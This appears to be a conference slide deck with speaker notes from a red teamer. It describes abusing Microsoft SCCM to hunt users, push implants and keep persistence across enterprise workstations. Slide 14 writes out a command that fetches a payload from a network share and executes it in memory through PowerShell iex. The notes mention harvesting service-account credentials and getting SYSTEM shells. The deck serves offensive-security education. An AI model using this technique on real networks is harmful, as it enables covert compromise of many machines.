2. @enigma0x3
❖ Penetration Tester and Red Teamer for the Adaptive
Threat Division (ATD) of Veris Group
❖ Active developer on the PowerShell Empire project
❖ Offensive PowerShell advocate
❖ 2nd time speaking!
❖ This con is probably older than I am
❖ Indiana corn farmer turned h4x0r (not really)
3. ❖ What is SCCM and how some admins fail at securing it
❖ Ways to abuse Microsoft’s System Center Configuration
Manager (SCCM) for targeted network compromise.
➢ I’m going to cover targeted, strategic use as opposed to mass pwnage
What this is...
4. Setting the Stage
❖ This talk assumes you have RDP access to a SCCM
server
❖ This talk is focused on abusing SCCM for lateral
movement/persistence in a targeted manner, not
obtaining access to SCCM.
❖ No, having access to SCCM does not mean you own the
enterprise
❖ If you administer SCCM as a domain admin, you fail.
5. What is SCCM?
❖ Platform for distributing packages/applications to clients
❖ Packages, applications and install scripts are hosted on
the SCCM server
❖ Setup and maintained via an agent/server architecture
❖ Consists of a central site server with distribution points.
➢ Agents check in to server periodically to obtain new
packages/applications
❖ Basically acts as internal RAT/C2
6. SCCM in the enterprise
❖ 1 central site server with multiple distribution points
❖ Typically managed via controlled groups
➢ e.g. “SCCM Admins” in AD
❖ Typically setup/configured using a service account to run
the application/push updates
❖ Application contents (*cough, cough install scripts and
notes*) are hosted on a publicly available share
❖ Admins gonna admin
7.
8. Right Click Tools
❖ Add-On that can be installed to assist in client
management tasks
❖ Should be installed on a client such as an administrative
workstation...not on the server
➢ Admins install it on the server anyways
❖ Enables full control of managed endpoints
10. Why use SCCM in Red Teaming?
❖ Manages a ton of distributed clients
➢ Take control of the server and you have distributed workstation control
➢ SCCM agents are just waiting to run your code
❖ Live off of the land
➢ Keep your malicious implant count low, use SCCM for very targeted
implant distribution
➢ Looks like normal day-to-day traffic/activity
➢ To limit the risk of getting caught, become an admin and not a typical
adversary
11. Why use SCCM in Red Teaming? (cont)
❖ Allows you to identify and strategically group targets
➢ Able to push implants out in a very controlled and surgical manner
❖ Also acts as a persistence mechanism
12. Abusing SCCM: Hunting
❖ Some organizations have user->device mapping
➢ This allows for admins to create specific groups for departments
❖ We can abuse this to hunt for specific users without
generating any additional network/domain traffic
13. Abusing SCCM: Compromise
❖ Create an application/package that utilizes PowerShell for
payload delivery and execution
❖ Do so by creating a PowerShell payload and throw it up
on the public share SCCM uses (typically something like
sccmsource)
14. Abusing SCCM: Compromise
❖ Create a script installer application to fetch and execute
your payload
➢ cmd.exe /c “powershell.exe -c “gc
serverNamesharedFolderApplicationFolderpayload.txt | iex””
❖ Deploy the application to your target group and wait for
the SCCM agents to check in
➢ Payload is fetched over UNC and runs in memory
❖ More here:
➢ https://enigma0x3.wordpress.com/2015/10/27/targeted-workstation-
compromise-with-sccm/
15.
16. Questions and Contact
❖ Feel free to hit me up!
❖ enigma0x3 [at] gmail [dot] com
❖ @enigma0x3 on Twitter and Github
❖ enigma0x3 on Freenode: #psempire
❖ Blog: enigma0x3.wordpress.com
Very targeted, strategic use instead of mass compromise
-External? Grab some workstation, reverse SSH tunnel w/ RDP access, RDP from there into SCCM server
-This is solely post-exploitation/maintaining access
(3:00)
service account/LA credentials often in install scripts/notes
(6:00)
-If installed, basically your own internal C2 controller
-List running processes, system information, registry access, SYSTEM command shell
-Uses Psexec, which is naughty on red teams…
-This shell doesn’t work unless they put psexec on the server...meaning if it exists, it will likely blend in just fine.
Might have access to all distribution points as well as central site server due to administration overhead
(9:00)
-If an application remains pushed out, hosts will continue to execute it during their normal checkins
-An open share is a common setup as the SCCM agents have to grab the deployed installation packages somehow.
-powershell reaches out over unc to grab contents of text file and execute
(12:00)